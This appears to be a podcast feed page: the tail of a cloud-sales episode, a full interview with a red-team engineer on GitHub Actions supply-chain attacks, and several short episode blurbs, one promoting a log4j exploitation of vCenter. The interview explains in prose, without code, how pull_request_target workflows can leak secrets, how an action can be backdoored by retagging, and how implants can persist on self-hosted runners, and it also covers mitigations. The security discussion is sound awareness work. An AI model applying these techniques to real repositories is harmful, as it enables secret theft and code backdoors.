You know, he was in IT, never worked with him when he was in IT and I was on the sales side. When he landed as a COO at this new organization, you know, I reached out to him and said, “Hey, this is what I'm doing.” And he kind of had the same of their conversations. He's like, “You know, I've worked with guys like you before. Or, you know, I've worked with a big VAR or something of that nature.” And I was like, “Let's just run a process. Let's do some evaluations. Let's see if it proves out value. If it doesn't, you know, we'll go from there.” So he made an introduction to the director of IT who's essentially the person that I needed to work with. Once we got into it, he was very apprehensive as well. He was like, “Well, why do we need to evaluate these things? I already did this two years ago and we found all these different problems, right?” And so, like Christoph mentioned earlier, we start at the cloud and cybersecurity. That's kind of where we start. This is where our focus is. First of all, the differentiates us in the market. Second of all, I don't think a lot of people are kind of leading with those conversations. And so he said, “That's fine. Like, we could go through this exercise.” I mean, I think he thought he already had this buttoned up, right? So they were in Colo. They're a SaaS company. They've had outages. They had security vulnerabilities. They have a small IT team. They essentially have no care and feeding of that environment. Or if they do, they're focusing a big portion of their time during that time on it when they can't focus on growing the SaaS company, right? There's just a plethora of challenges that they were seeing. And then cost was a big factor. 
And essentially, because he went out to market and he doesn't know what fair market values are and a lot of the times when you get that first quote or depending on what provider you go to or what specifically if you didn't establish that baseline really well, like you can't just go get a snapshot of vCenter and take it out to market. That's not a good process, right? So once we kind of peeled back the onion and we understood all the different dynamics that go into it, you know, he said, “Okay, well, I think you can definitely drive this to more of a private cloud environment. They're more cost economic from that perspective than go into a public cloud. Plus you need an extension of your team based on your team size and all these things.” And so we started extrapolating that and figuring out which workloads need to be highly available, have DR associated with them because of different compliance agreements and things that are in place. So they still kept something in Colo, actually. They have one or two racks now from what they currently had, but they moved the other 89 servers into a cloud environment and started leveraging a major service provider that's part of the Telarus ecosystem. They're a phenomenal group. We've had great success with them. And, you know, at the end of the day, it's very transformational from a couple things, at least from an executive perspective. Now they don't have reputation. Some of their clients are very large clients, you know, household names, if you will. So no more outages, right? They're highly available. It's transformed their reputation from that perspective. They've actually layered on that some of their talk tracks about how this technology enables their end clients, right? So they sell a SaaS platform. It's a POS. Their consumers are buying it. This is how you can scale. This is how we can make the overall buying experience for your clients better, right? 
So, you know, all of these things have truly transitioned their business from IT being a cost center to IT providing value to their overall organization and their end clients, right? So I would say that's where we get excited about transformational. Usually it's not flipping, you know, from one sin to a different sin. That's not usually a transformational change. It's how is it enabling or driving that business forward? And there's a lot of other use cases or applicable things that probably came out of that deal, but I would say that's a good high level. Christoph, were you gonna mention something?
– No, nothing other than, you know, I think that was a really good example of, you know, a small IT team that needed help, needed direction, needed Brandon's guidance. You know, they hadn't gone out to market and looked at this for years. And so, you know, having Brandon as an extension, I think it was eyeopening around what is evolved in the market, what's available to them. And yeah, it was just a really fun project to see and be a part of.
– It is always interesting when you, you know, from an engineering perspective, we always go in and say, what do you need? What do you need it to do? What's the problem that it needs to solve? And then when we ask that question of, okay, but if you could do this, if you could evolve your application, if you could go do this, your competitors are doing this, if you could do something like that or, you know, have a leg up, would that be game changing for you? And I think you get them to think differently because sometimes they just think, I'm just never gonna get to that, or I don't know that it's possible. Or to your point, you know, we looked at it two years ago and it wasn't possible. How much changes in this industry in two years, right? With all of the tech and everything flooding into here. So yeah, I love hearing a good transformational story because yeah, you brought it up and you nailed it where IT's not a cost center, right? 
IT has the power to change the business and change the company. So awesome story.
– Yeah.
– All right, Christoph, I need you to wrap us up, take us home, man. I want to hear, you know, if I'm a partner that's listening to this and maybe I haven't ventured as deep into cloud or into security, and we talked about kind of where you started, we talked about some of the difficulties that you guys have been through in these conversations, but maybe just talk to me about people that aren't comfortable with this or haven't stepped into it. What's your advice? What are you recommending in that, right? Because not just for now, but as this continues to evolve in the future.
– Sure. Yeah, I mean, honestly, I think I'd take a step back and come to the realization that this isn't that complicated, right? Like don't get too caught up in the technology. Don't learn about every single EDR solution or every single cloud solution or every single infrastructure solution. Just have conversations with the business team and leaders within an organization. Get to know their team, get to know, I said this earlier, but I mean, I think it's a super important point. Get to know what are the skill sets? How big is the team? You know, where are the gaps that you have, whether it's infrastructure, security, network, you know, database, it doesn't matter. Just get to know like, where are the gaps? I mentioned it earlier, but this idea of the great resignation, this thing is real. Like people are struggling to find people. And do you know where most of these people are? They're at providers and they're at providers because they're super smart. Not that, you know, the people down in the trenches aren't, but they're really good, highly skilled professionals that want to work with hundreds of different customers and have unique challenges every single day to solve. They're not working for one company. And because those guys are typically getting kind of bored. 
And so get to know the company, get to know their challenges, understand, you know, what are they looking to accomplish? Where are they looking to go? What are their core competencies? And how can you bring solutions and ideas to the table that free them up to focus on those core competencies? You know, that's really it. Talk about the business. Get to know what their ideal outcomes are and generally positive, good opportunities of ways that you can assist, you know, come right out of that. And lastly, I'm preaching to the choir, but lean into Telarus, right? Like get to know the team, get to know the channel managers, get to know the engineering team. You know, we greatly appreciate the support that, you know, you folks have brought to us as an extension of our team. You know, we can't be experts on every single technology. We can't be experts on every single conversation. And just knowing that, you know, we can bounce ideas off you. You don't even have to be on every customer call or any customer calls for that matter. But just being a soundboard to us, as we work through just different, you know, talk tracks internally, you know, we just want to say, we're grateful to, you know, you and your team, Josh, you guys have been great. And yeah, that's my very basic advice for somebody to just dive in. – I love it. You brought up a good point. I was reading a stat last night that makes this a math problem, right? That the title of this podcast is how in the world are we going to ever solve for this whole talent shortage in tech and, you know, starting before the great resignation, now it's just gotten ultimately so much worse. But from a security perspective, right? We talk about the great security certification, the CISSP, of it gives us a great holistic view on how security impacts the business. It's not just technology. It focuses on all these different domains. There are roughly 90 to 100,000 certified CISSPs in the United States. 
And there are 20 to 30,000 job openings that require a CISSP. Now I'm not a math expert here, but to your point where that talent is, we know where that talent is, and it's at that supplier side. You guys are dead on. I think you guys are out there. You're crushing it, recognizing that this is where the talent is. And you guys have done a phenomenal job of mapping all that and appreciate the kind words. Just appreciate the opportunity to work with you guys. So no, it's been awesome and we're excited to continue with this go. So Christoph I appreciate you bringing us home and thanks so much for coming on today, man. – Josh, thanks for having us. We had a great time and look forward to doing this again in the future. – Brandon, you as well, appreciate you coming on. Thanks. I know you guys got a lot going on. So thanks again for spending time with me, man. – Hey, Josh. – Okay. All right, everybody, that wraps us up. I'm your host, Josh Lupresto, SVP of Sales Engineering at Telarus and this is Next Level BizTech.
Adnan Khan, Lead Security Engineer at Praetorian, joins Corey on Screaming in the Cloud to discuss software bill of materials and supply chain attacks. Adnan describes how simple pull requests can lead to major security breaches, and how to best avoid those vulnerabilities. Adnan and Corey also discuss the rapid innovation at GitHub Actions, and the pros and cons of having new features added so quickly when it comes to security. Adnan also discusses his view on the state of AI and its impact on cloud security.
About Adnan
Adnan is a Lead Security Engineer at Praetorian. He is responsible for executing on Red-Team Engagements as well as developing novel attack tooling in order to meet and exceed engagement objectives and provide maximum value for clients.
His past experience as a software engineer gives him a deep understanding of where developers are likely to make mistakes, and has applied this knowledge to become an expert in attacks on organizations' CI/CD systems.
Links Referenced:
Praetorian: https://www.praetorian.com/
Twitter: https://twitter.com/adnanthekhan
Praetorian blog posts: https://www.praetorian.com/author/adnan-khan/
Transcript
Announcer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.
Corey: Are you navigating the complex web of API management, microservices, and Kubernetes in your organization? Solo.io is here to be your guide to connectivity in the cloud-native universe!
Solo.io, the powerhouse behind Istio, is revolutionizing cloud-native application networking. 
They brought you Gloo Gateway, the lightweight and ultra-fast gateway built for modern API management, and Gloo Mesh Core, a necessary step to secure, support, and operate your Istio environment.
Why struggle with the nuts and bolts of infrastructure when you can focus on what truly matters - your application. Solo.io's got your back with networking for applications, not infrastructure. Embrace zero trust security, GitOps automation, and seamless multi-cloud networking, all with Solo.io.
And here's the real game-changer: a common interface for every connection, in every direction, all with one API. It's the future of connectivity, and it's called Gloo by Solo.io.
DevOps and Platform Engineers, your journey to a seamless cloud-native experience starts here. Visit solo.io/screaminginthecloud today and level up your networking game.
Corey: As hybrid cloud computing becomes more pervasive, IT organizations need an automation platform that spans networks, clouds, and services—while helping deliver on key business objectives. Red Hat Ansible Automation Platform provides smart, scalable, sharable automation that can take you from zero to automation in minutes. Find it in the AWS Marketplace.
Corey: Welcome to Screaming in the Cloud, I'm Corey Quinn. I've been studiously ignoring a number of buzzword, hype-y topics, and it's probably time that I addressed some of them. One that I've been largely ignoring, mostly because of its prevalence at Expo Hall booths at RSA and other places, has been software bill of materials and supply chain attacks. Finally, I figured I would indulge the topic. Today I'm speaking with Adnan Khan, lead security engineer at Praetorian. Adnan, thank you for joining me.
Adnan: Thank you so much for having me.
Corey: So, I'm trying to understand, on some level, where the idea of these SBOM or bill-of-material attacks have—where they start and where they stop. I've seen it as far as upstream dependencies have a vulnerability. Great. 
I've seen misconfigurations in how companies wind up configuring their open-source presences. There have been a bunch of different, it feels almost like orthogonal concepts to my mind, lumped together as this is a big scary thing because if we have a big single scary thing we can point at, that unlocks budget. Am I being overly cynical on this or is there more to it?
Adnan: I'd say there's a lot more to it. And there's a couple of components here. So first, you have the SBOM-type approach to security where organizations are looking at which packages are incorporated into their builds. And vulnerabilities can come out in a number of ways. So, you could have software actually have bugs or you could have malicious actors actually insert backdoors into software.
I want to talk more about that second point. How do malicious actors actually insert backdoors? Sometimes it's compromising a developer. Sometimes it's compromising credentials to push packages to a repository, but other times, it could be as simple as just making a pull request on GitHub. And that's somewhere where I've spent a bit of time doing research, building off of techniques that other people have documented, and also trying out some attacks for myself against two Microsoft repositories and several others that have reported over the last few months that would have been able to allow an attacker to slip a backdoor into code and expand the number of projects that they are able to attack beyond that.
Corey: I think one of the areas that we've seen a lot of this coming from has been the GitHub Action space. And I'll confess that I wasn't aware of a few edge-case behaviors around this. 
Most of my experience with client-side Git configuration in the .git repository—pre-commit hooks being a great example—intentionally and by design from a security perspective, do not convey when you check that code in and push it somewhere, or grab someone else's, which is probably for the best because otherwise, it's, “Oh yeah, just go ahead and copy your password hash file and email that to something else via a series of arcane shell script stuff.” The vector is there. I was unpleasantly surprised somewhat recently to discover that when I cloned a public project and started running it locally and then adding it to my own fork, that it would attempt to invoke a whole bunch of GitHub Actions flows that I'd never, you know, allowed it to do. That was… let's say, eye-opening.
Adnan: [laugh]. Yeah. So, on the particular topic of GitHub Actions, the pull request as an attack vector, like, there's a lot of different forms that an attack can take. So, one of the more common ones—and this is something that's been around for just about as long as GitHub Actions has been around—and this is a certain trigger called ‘pull request target.’ What this means is that when someone makes a pull request against the base repository, maybe a branch within the base repository such as main, that will be the workflow trigger.
And from a security's perspective, when it runs on that trigger, it does not require approval at all. And that's something that a lot of people don't really realize when they're configuring their workflows. 
Because normally, when you have a pull request trigger, the maintainer can check a box that says, “Oh, require approval for all external pull requests.” And they think, “Great, everything needs to be approved.” If someone tries to add malicious code to run that's on the pull request target trigger, then they can look at the code before it runs and they're fine.

But in a pull request target trigger, there is no approval and there's no way to require an approval, except for configuring the workflow securely. So, in this case, what happens is, and in one particular case against the Microsoft repository, this was a Microsoft reusable GitHub Action called GPT Review. It was vulnerable because it checked out code from my branch—so if I made a pull request, it checked out code from my branch, and you could find this by looking at the workflow—and then it ran tests on my branch, so it's running my code. So, by modifying the entry points, I could run code that runs in the context of that base branch and steal secrets from it, and use those to perform malicious Actions.

Corey: Got you. It feels like historically, one of the big threat models around things like this is al—[and when 00:06:02] you have any sort of CI/CD exploit—is either falls down one of two branches: it's either the getting secret access so you can leverage those credentials to pivot into other things—I've seen a lot of that in the AWS space—or more boringly, and more commonly in many cases, it seems to be oh, how do I get it to run this crypto miner nonsense thing, with the somewhat large-scale collapse of crypto across the board, it's been convenient to see that be less prevalent, but still there. Just because you're not making as much money means that you'll still just have to do more of it when it's all in someone else's account. So, I guess it's easier to see and detect a lot of the exploits that require a whole bunch of compute power.
The, oh by the way, we stole your secrets and now we're going to use that to lateral into an organization seem like it's something far more… I guess, dangerous and also sneaky.

Adnan: Yeah, absolutely. And you hit the nail on the head there with sneaky because when I first demonstrated this, I made a test account, I created a PR, I made a couple of Actions such as I modified the name of the release for the repository, I just put a little tag on it, and didn't do any other changes. And then I also created a feature branch in one of Microsoft's repositories. I don't have permission to do that. That just sat there for about almost two weeks and then someone else exploited it and then they responded to it.

So, sneaky is exactly the word you could describe something like this. And another reason why it's concerning is, beyond the secret disclosure for—and in this case, the repository only had an OpenAI API key, so… okay, you can talk to ChatGPT for free. But this was itself a GitHub Action and it was used by another Microsoft machine-learning project that had a lot more users, called SynapseML, I believe was the name of the other project. So, what someone could do is backdoor this Action by creating a commit in a feature branch, which they can do by stealing the built-in GitHub token—and this is something that all GitHub Action runs have; the permissions for it vary, but in this case, it had the right permissions—attacker could create a new branch, modify code in that branch, and then modify the tag, which in Git, tags are mutable, so you can just change the commit the tag points to, and now, every time that other Microsoft repository runs GPT Review to review a pull request, it's running attacker-controlled code, and then that could potentially backdoor that other repository, steal secrets from that repository.

So that's, you know, one of the scary parts of, in particular backdooring a GitHub Action.
And I believe there was a very informative Blackhat talk this year, that someone from—I'm forgetting the name of the author, but it was a very good watch about how Actions vulnerabilities can be vulnerable, and this is kind of an example of—it just happened to be that this was an Action as well.

Corey: That feels like this is an area of exploit that is becoming increasingly common. I tie it almost directly to the rise of GitHub Actions as the default CI/CD system that a lot of folks have been using. For the longest time, it seemed like a poorly configured Jenkins box hanging out somewhere in your environment that was the exception to the Infrastructure as Code rule because everyone has access to it, configures it by hand, and invariably it has access to production was the way that people would exploit things. For a while, you had CircleCI and Travis-CI, before Travis imploded and Circle did a bunch of layoffs. Who knows where they're at these days?

But it does seem that the common point now has been GitHub Actions, and a .github folder within that Git repo with a workflows YAML file effectively means that a whole bunch of stuff can happen that you might not be fully aware of when you're cloning or following along with someone's tutorial somewhere. That has caught me out in a couple of strange ways, but nothing disastrous because I do believe in realistic security boundaries. I just worry how much of this is the emerging factor of having a de facto standard around this versus something that Microsoft has actively gotten wrong. What's your take on it?

Adnan: Yeah. So, my take here is that GitHub could absolutely be doing a lot more to help prevent users from shooting themselves in the foot. Because their documentation is very clear and quite frankly, very good, but people aren't warned when they make certain configuration settings in their workflows. I mean, GitHub will happily take the settings and, you know, they hit commit, and now the workflow could be vulnerable.
There's no automatic linting of workflows, or a little suggestion box popping up like, “Hey, are you sure you want to configure it this way?”

The technology to detect that is there. There's a lot of third-party utilities that will lint Actions workflows. Heck, for looking for a lot of these pull request target-type vulnerabilities, I use a GitHub code search query. It's just a regular expression. So, having something that at least nudges users to not make that mistake would go really far in helping people not make these mista—you know, adding vulnerabilities to their projects.

Corey: It seems like there's also been issues around the GitHub Actions integration approach where OIDC has not been scoped correctly a bunch of times. I've seen a number of articles come across my desk in that context and fortunately, when I wound up passing out the ability for one of my workflows to deploy to my AWS account, I got it right because I had no idea what I was doing and carefully followed the instructions. But I can totally see overlooking that one additional parameter that leaves things just wide open for disaster.

Adnan: Yeah, absolutely. That's one where I haven't spent too much time actually looking for that myself, but I've definitely read those articles that you mentioned, and yeah, it's very easy for someone to make that mistake, just like, it's easy for someone to just misconfigure their Action in general. Because in some of the cases where I found vulnerabilities, there would actually be a commit saying, “Hey, I'm making this change because the Action needs access to these certain secrets.
And oh, by the way, I need to update the checkout steps so it actually checks out the PR head so that it's [testing 00:12:14] that PR code.” Like, people are actively making a decision to make it vulnerable because they don't realize the implication of what they've just done.

And in the second Microsoft repository that I found the bug in, was called Microsoft Confidential Sidecar Containers. That repository, the developer a week prior to me identifying the bug made a commit saying that we're making a change and it's okay because it requires approval. Well, it doesn't because it's a pull request target.

Corey: Part of me wonders how much of this is endemic to open-source as envisioned through enterprises versus my world of open-source, which is just eh, I've got this weird side project in my spare time, and it seemed like it might be useful to someone else, so I'll go ahead and throw it up there. I understand that there's been an awful lot of commercialization of open-source in recent years; I'm not blind to that fact, but it also seems like there's a lot of companies playing very fast and loose with things that they probably shouldn't be since they, you know, have more of a security apparatus than any random contributors standing up a clone of something somewhere will.

Adnan: Yeah, we're definitely seeing this a lot in the machine-learning space because of companies that are trying to move so quickly with trying to build things because OpenAI AI has blown up quite a bit recently, everyone's trying to get a piece of that machine learning pie, so to speak. And another thing of what you're seeing is, people are deploying self-hosted runners with Nvidia, what is it, the A100, or—it's some graphics card that's, like, $40,000 apiece attached to runners for running integration tests on machine-learning workflows.
And someone could, via a pull request, also just run code on those and mine crypto.

Corey: I kind of miss the days when exploiting computers is basically just a way for people to prove how clever they were or once in a blue moon come up with something innovative. Now, it's like, well, we've gone all around the mulberry bush just so we can basically make computers solve a sudoku form, and in return, turn that into money down the road. It's frustrating, to put it gently.

Adnan: [laugh].

Corey: When you take a look across the board at what companies are doing and how they're embracing the emerging capabilities inherent to these technologies, how do you avoid becoming a cautionary tale in the space?

Adnan: So, on the flip side of companies having vulnerable workflows, I've also seen a lot of very elegant ways of writing secure workflows. And some of the repositories are using deployment environments—which is the GitHub Actions feature—to enforce approval checks. So, workflows that do need to run on pull request target because of the need to access secrets for pull requests will have a step that requires a deployment environment to complete, and that deployment environment is just an approval and it doesn't do anything. So essentially, someone who has permissions to the repository will go in, approve that environment check, and only then will the workflow continue. So, that adds mandatory approvals to pull requests where otherwise they would just run without approval.

And this is on, particularly, the pull request target trigger. Another approach is making it so the trigger is only running on the label event and then having a maintainer add a label so the tests can run and then remove the label. So, that's another approach where companies are figuring out ways to write secure workflows and not leave their repositories vulnerable.

Corey: It feels like every time I turn around, GitHub Actions has gotten more capable.
And I'm not trying to disparage the product; it's kind of the idea of what we want. But it also means that there's certainly not an awareness in the larger community of how these things can go awry that has kept up with the pace of feature innovation. How do you balance this without becoming the Department of No?

Adnan: [laugh]. Yeah, so it's a complex issue. I think GitHub has evolved a lot over the years. Actions, it's—despite some of the security issues that happen because people don't configure them properly—is a very powerful product. For a CI/CD system to work at the scale it does and allow so many repositories to work and integrate with everything else, it's really easy to use. So, it's definitely something you don't want to take away or have an organization move away from something like that because they are worried about the security risks.

When you have features coming in so quickly, I think it's important to have a base, kind of like, a mandatory reading. Like, if you're a developer that writes and maintains an open-source software, go read through this document so you can understand the do's and don'ts instead of it being a patchwork where some people, they take a good security approach and write secure workflows and some people just kind of stumble through Stack Overflow, find what works, messes around with it until their deployment is working and their CI/CD is working and they get the green checkmark, and then they move on to their never-ending list of tasks that—because they're always working on a deadline.

Corey: Reminds me of a project I saw a few years ago when it came out that Volkswagen had been lying to regulators. It was a framework someone built called ‘Volkswagen' that would detect if it was running inside of a CI/CD environment, and if so, it would automatically make all the tests pass. I have a certain affinity for projects like that.
Another one was a tool that would intentionally degrade the performance of a network connection so you could simulate having a latent or stuttering connection with packet loss, and they call that ‘Comcast.' Same story. I just thought that it's fun seeing people get clever on things like that.

Adnan: Yeah, absolutely.

Corey: When you take a look now at the larger stories that are emerging in the space right now, I see an awful lot of discussion coming up that ties to SBOMs and understanding where all of the components of your software come from. But I chased some stuff down for fun once, and I gave up after 12 dependency leaps from just random open-source frameworks. I mean, I see the Dependabot problem that this causes as well, where whenever I put something on GitHub and then don't touch it for a couple of months—because that's how I roll—I come back and there's a whole bunch of terrifyingly critical updates that it's warning me about, but given the nature of how these things get used, it's never going to impact anything that I'm currently running. So, I've learned to tune it out and just ignore it when it comes in, which is probably the worst of all possible approaches. Now, if I worked at a bank, I should probably take a different perspective on this, but I don't.

Adnan: Mm-hm. Yeah. And that's kind of a problem you see, not just with SBOMs. It's just security alerting in general, where anytime you have some sort of signal and people who are supposed to respond to it are getting too much of it, you just start to tune all of it out. It's like that human element that applies to so much in cybersecurity.

And I think for the particular SBOM problem, where, yeah, you're correct, like, a lot of it… you don't have reachability because you're using a library for one particular function and that's it.
And this is somewhere where I'm not that much of an expert in where doing more static source analysis and reachability testing, but I'm certain there are products and tools that offer that feature to actually prioritize SBOM-based alerts based on actual reachability versus just having an as a dependency or not.

[midroll 00:20:00]

Corey: I feel like, on some level, wanting people to be more cautious about what they're doing is almost shouting into the void because I'm one of the only folks I found that has made the assertion that oh yeah, companies don't actually care about security. Yes, they email you all the time after they failed to protect your security, telling you how much they care about security, but when you look at where they invest, feature velocity always seems to outpace investment in security approaches. And take a look right now at the hype we're seeing across the board when it comes to generative AI. People are excited about the capabilities and security is a distant afterthought around an awful lot of these things. I don't know how you drive a broader awareness of this in a way that sticks, but clearly, we haven't collectively found it yet.

Adnan: Yeah, it's definitely a concern. When you see things on—like for example, you can look at GitHub's roadmap, and there's, like, a feature there that's, oh, automatic AI-based pull request handling. Okay, so does that mean one day, you'll have a GitHub-powered LLM just approve PRs based on whether it determines that it's a good improvement or not? Like, obviously, that's not something that's the case now, but looking forward to maybe five, six years in the future, in the pursuit of that ever-increasing velocity, could you ever have a situation where actual code contributions are reviewed fully by AI and then approved and merged?
Like yeah, that's scary because now you have a threat actor that could potentially specifically tailor contributions to trick the AI into thinking they're great, but then it could turn around and be a backdoor that's being added to the code.

Obviously, that's very far in the future and I'm sure a lot of things will happen before that, but it starts to make you wonder, like, if things are heading that way. Or will people realize that you need to look at security at every step of the way instead of just thinking that these newer AI systems can just handle everything?

Corey: Let's pivot a little bit and talk about your day job. You're a lead security engineer at what I believe to be a security-focused consultancy. Or—

Adnan: Yeah.

Corey: If you're not a SaaS product. Everything seems to become a SaaS product in the fullness of time. What's your day job look like?

Adnan: Yeah, so I'm a security engineer on Praetorian's red team. And my day-to-day, I'll kind of switch between application security and red-teaming. And that kind of gives me the opportunity to, kind of, test out newer things out in the field, but then also go and do more traditional application security assessments and code reviews, and reverse engineering to kind of break up the pace of work. Because red-teaming can be very fast and fast-paced and exciting, but sometimes, you know, that can lead to some pretty late nights. But that's just the nature of being on a red team [laugh].

Corey: It feels like as soon as I get into the security space and start talking to cloud companies, they get a lot more defensive than when I'm making fun of, you know, bad service naming or APIs that don't make a whole lot of sense. It feels like companies have a certain sensitivity around the security space that applies to almost nothing else.
Do you find, as a result, that a lot of the times when you're having conversations with companies and they figure out that, oh, you're a red team for a security researcher, oh, suddenly, we're not going to talk to you the way we otherwise might. We thought you were a customer, but nope, you can just go away now.

Adnan: [laugh]. I personally haven't had that experience with cloud companies. I don't know if I've really tried to buy a lot. You know, I'm… if I ever buy some infrastructure from cloud companies as an individual, I just kind of sign up and put in my credit card. And, you know, they just, like, oh—you know, they just take my money. So, I don't really think I haven't really, personally run into anything like that yet [laugh].

Corey: Yeah, I'm curious to know how that winds up playing out in some of these, I guess, more strategic, larger company environments. I don't get to see that because I'm basically a tiny company that dabbles in security whenever I stumble across something, but it's not my primary function. I just worry on some level one of these days, I'm going to wind up accidentally dropping a zero-day on Twitter or something like that, and suddenly, everyone's going to come after me with the knives. I feel like [laugh] at some point, it's just going to be a matter of time.

Adnan: Yeah. I think when it comes to disclosing things and talking about techniques, the key thing here is that a lot of the things that I'm talking about, a lot of the things that I'll be talking about in some blog posts that have coming out, this is stuff that these companies are seeing themselves. Like, they recognize that these are security issues that people are introducing into code. They encourage people to not make these mistakes, but when it's buried in four links deep of documentation and developers are tight on time and aren't digging through their security documentation, they're just looking at what works, getting it to work and moving on, that's where the issue is.
So, you know, from a perspective of raising awareness, I don't feel bad if I'm talking about something that the company itself agrees is a problem. It's just a lot of the times, their own engineers don't follow their own recommendations.

Corey: Yeah, I have opinions on these things and unfortunately, it feels like I tend to learn them in some of the more unfortunate ways of, oh, yeah, I really shouldn't care about this thing, but I only learned what the norm is after I've already done something. This is, I think, the problem inherent to being small and independent the way that I tend to be. We don't have enough people here for there to be a dedicated red team and research environment, for example. Like, I tend to bleed over a little bit into a whole bunch of different things. We'll find out. So far, I've managed to avoid getting it too terribly wrong, but I'm sure it's just a matter of time.

So, one area that I think seems to be a way that people try to avoid cloud issues is oh, I read about that in the last in-flight magazine that I had in front of me, and the cloud is super insecure, so we're going to get around all that by running our own infrastructure ourselves, from either a CI/CD perspective or something else. Does that work when it comes to this sort of problem?

Adnan: Yeah, glad you asked about that. So, we've also seen open-s—companies that have large open-source presence on GitHub just opt to have self-hosted GitHub Actions runners, and that opens up a whole different Pandora's box of attacks that an attacker could take advantage of, and it's only there because they're using that kind of runner. So, the default GitHub Actions runner, it's just an agent that runs on a machine, it checks in with GitHub Actions, it pulls down builds, runs them, and then it waits for another build. So, these are—the default state is a non-ephemeral runner with the ability to fork off tasks that can run in the background.
So, when you have a public repository that has a self-hosted runner attached to it, it could be at the organization level or it could be at the repository level.

What an attacker can just do is create a pull request, modify the pull request to run on a self-hosted runner, write whatever they want in the pull request workflow, create a pull request, and now as long as they were a previous contributor, meaning you fixed a typo, you… that could be a such a, you know, a single character typo change could even cause that, or made a small contribution, now they create the pull request. The arbitrary job that they wrote is now picked up by that self-hosted runner. They can fork off it, process it to run in the background, and then that just continues to run, the job finishes, their pull request, they'll just—they close it. Business as usual, but now they've got an implant on the self-hosted runner. And if the runners are non-ephemeral, it's very hard to completely lock that down.

And that's something that I've seen, there's quite a bit of that on GitHub where—and you can identify it just by looking at the run logs. And that's kind of comes from people saying, “Oh, let's just self-host our runners,” but they also don't configure that properly. And that opens them up to not only tampering with their repositories, stealing secrets, but now depending on where your runner is, now you potentially could be giving an attacker a foothold in your cloud environment.

Corey: Yeah, that seems like it's generally a bad thing. I found that cloud tends to be more secure than running it yourself in almost every case, with the exception that once someone finds a way to break into it, there's suddenly a lot more eggs in a very large, albeit more secure, basket. So, it feels like it's a consistent trade-off. But as time goes on, it feels like it is less and less defensible, I think, to wind up picking out an on-prem strategy from a pure security point of view. I mean, there are reasons to do it.
I'm just not sure.

Adnan: Yeah. And I think that distinction to be made there, in particular with CI/CD runners is there's cloud, meaning you let your—there's, like, full cloud meaning you let your CI/CD provider host your infrastructure as well; there's kind of that hybrid approach you mentioned, where you're using a CI/CD provider, but then you're bringing your own cloud infrastructure that you think you could secure better; or you have your runners sitting in vCenter in your own data center. And all of those could end up being—both having a runner in your cloud and in your data center could be equally vulnerable if you're not segmenting builds properly. And that's the core issue that happens when you have a self-hosted runner is if they're not ephemeral, it's very hard to cut off all attack paths. There's always something an attacker can do to tamper with another build that'll have some kind of security impact. You need to just completely isolate your builds and that's essentially what you see in a lot of these newer guidances like the [unintelligible 00:30:04] framework, that's kind of the core recommendation of it is, like, one build, one clean runner.

Corey: Yeah, that seems to be the common wisdom. I've been doing a lot of work with my own self-hosted runners that run inside of Lambda. Definitionally those are, of course, ephemeral. And there's a state machine that winds up handling that and screams bloody murder if there's a problem with it. So far, crossing fingers hoping it works out well.

And I have a bounded to a very limited series of role permissions, and of course, its own account of constraint blast radius. But there's still—there are no guarantees in this. The reason I build it the way I do is that, all right, worst case someone can get access to this. The only thing they're going to have the ability to do is, frankly, run up my AWS bill, which is an area I have some small amount of experience with.

Adnan: [laugh].
Yeah, yeah, that's always kind of the core thing where if you get into someone's cloud, like, well, just sit there and use their compute resources [laugh].

Corey: Exactly. I kind of miss when that was the worst failure mode you had for these things.

Adnan: [laugh].

Corey: I really want to thank you for taking the time to speak with me today. If people want to learn more, where's the best place for them to find you?

Adnan: I do have a Twitter account. Well, I guess you can call it Twitter anymore, but, uh—

Corey: Watch me. Sure I can.

Adnan: [laugh]. Yeah, so I'm on Twitter, and it's @adnanthekhan. So, it's like my first name with ‘the' and then K-H-A-N because, you know, my full name probably got taken up, like, years before I ever made a Twitter account. So, occasionally I tweet about GitHub Actions there.

And on Praetorian's website, I've got a couple of blog posts. I have one—the one that really goes in-depth talking about the two Microsoft repository pull request attacks, and a couple other ones that are disclosed, will hopefully drop on the twenty—what is that, Tuesday? That's going to be the… that's the 26th. So, it should be airing on the Praetorian blog then. So, if you—

Corey: Excellent. It should be out by the time this is published, so we will, of course, put a link to that in the [show notes 00:32:01]. Thank you so much for taking the time to speak with me today. I appreciate it.

Adnan: Likewise. Thank you so much, Corey.

Corey: Adnan Khan, lead security engineer at Praetorian. I'm Cloud Economist Corey Quinn and this is Screaming in the Cloud.
If you've enjoyed this podcast, please leave a five-star review on your podcast platform of choice, whereas if you've hated this podcast, please leave a five-star review on your podcast platform of choice, along with an insulting comment that's probably going to be because your podcast platform of choice is somehow GitHub Actions.

Adnan: [laugh].

Corey: If your AWS bill keeps rising and your blood pressure is doing the same, then you need The Duckbill Group. We help companies fix their AWS bill by making it smaller and less horrifying. The Duckbill Group works for you, not AWS. We tailor recommendations to your business and we get to the point. Visit duckbillgroup.com to get started.
Oooo, giggidy! Today's tale of pentest pwnage is about pwning vCenter with CVE-2021-44228 - a vulnerability that lets us bypass authentication entirely and do/take what we want from vCenter! Key links to make the magic happen:
- How to exploit log4j manually in vCenter
- How to automate the attack!
- Tool to steal the SAML database you extract from vCenter
!!WARNING: DEEP SYSADMIN CUTS AHEAD!! Back in the early 2000s, if you were a sysadmin that had to set up desktops or servers, you probably used Norton Ghost to create images. When virtualization became big, that process moved to creating VM templates. But there was still often a lot of manual intervention in these tasks - password setting, BIOS updates, vCenter installations and more. As the IT world moves more and more towards automating software tasks, what about automating infrastructure provisioning? Sure, there's cloud, but what if you're still on-prem? This week, Rob Hirschfeld of RackN joins us to discuss how RackN helps automate the previously un-automate-able.
On this week's episode of the podcast I cover info on some new features coming to Windows 11, some new Azure services, details of new versions of ESXi and vCenter plus more! Reference Links: https://www.rorymon.com/blog/two-chrome-patches-in-5-days-mac-ransomware-cio-fined-for-failed-migration/
Rich and Branden are pretty big fanboys of #vmware #esxi, and this podcast is about ESXi and vCenter. Visit our website here: https://2guystek.tv/ for all things 2GT! And thank you so much for listening!
Today we offer you some first impressions of OVHcloud and how we're seriously considering moving our Light Pentest LITE training class to it! TLDR:
- It runs on vCenter, my first and only virtualization love!
- Unlimited VM "powered on" time and unlimited bandwidth
- Integration with PowerShell so you can run a single script to "heal" your environment to a gold image
- Easy integration with pfSense to be able to manage the firewall and internal/external IPs
- Price comparable to what we're paying now in Azure land
